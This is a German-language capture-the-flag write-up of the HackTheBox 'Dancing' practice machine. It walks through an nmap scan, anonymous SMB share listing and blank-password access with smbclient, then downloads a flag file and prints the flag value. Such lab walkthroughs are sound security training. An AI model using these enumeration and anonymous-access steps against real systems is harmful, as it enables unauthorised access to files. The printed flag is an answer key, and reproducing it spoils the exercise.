HackTheBox WriteUp – Starting Point – Dancing

https://app.hackthebox.com/starting-point

Dancing

Task1:
What does the 3-letter acronym SMB stand for?

Antwort 1:
Server Message Block

Task 2:
What port does SMB use to operate at?

Antwort 2:
445

Task 3:
What is the service name for port 445 that came up in our Nmap scan?

Starten wir also nmap und scannen die Machine:

└─$ nmap 10.129.79.156 -sV 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-02 18:34 CET
Nmap scan report for 10.129.79.156
Host is up (0.051s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds

Antwort 3:
microsoft-ds

Task 4:
What is the ‚flag‘ or ’switch‘ we can use with the SMB tool to ‚list‘ the contents of the share?

Die Antwort finden wir in der Beschreibung (Hilfe) von smbclient:

└─$ smbclient --help                                        
Usage: smbclient [OPTIONS] service <password>
  -M, --message=HOST                           Send message
  -I, --ip-address=IP                          Use this IP to connect to
  -E, --stderr                                 Write messages to stderr instead of stdout
  -L, --list=HOST                              Get a list of shares available on a host
--snip--

Antwort 4:
-L

Task 5:
How many shares are there on Dancing?

Wir nutzen smbclient, um uns den Inhalt anzeigen zu lassen. Bei der Passwortabfrage drücken wir einfach Enter:

└─$ smbclient -L 10.129.79.156                 
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.79.156 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Antwort 5:
4

Task 6:
What is the name of the share we are able to access in the end with a blank password?

Wir müssen vielleicht etwas herumprobieren und erhalten Zugriff auf „WorkShares“:

└─$ smbclient //10.129.79.156/WorkShares 
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> 

Antwort 6:
WorkShares

Task 7:
What is the command we can use within the SMB shell to download the files we find?

Antwort 7:
get

Task 8:
Submit root flag

Wir gucken uns etwas in den Verzeichnissen um und finden die Flag:

smb: \> ls
  .                                   D        0  Mon Mar 29 10:22:01 2021
  ..                                  D        0  Mon Mar 29 10:22:01 2021
  Amy.J                               D        0  Mon Mar 29 11:08:24 2021
  James.P                             D        0  Thu Jun  3 10:38:03 2021

                5114111 blocks of size 4096. 1748683 blocks available
smb: \> cd James.P
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 10:38:03 2021
  ..                                  D        0  Thu Jun  3 10:38:03 2021
  flag.txt                            A       32  Mon Mar 29 11:26:57 2021

                5114111 blocks of size 4096. 1748683 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \James.P\> 

Antwort 8:
5f61c10dffbc77a704d76016a22f1664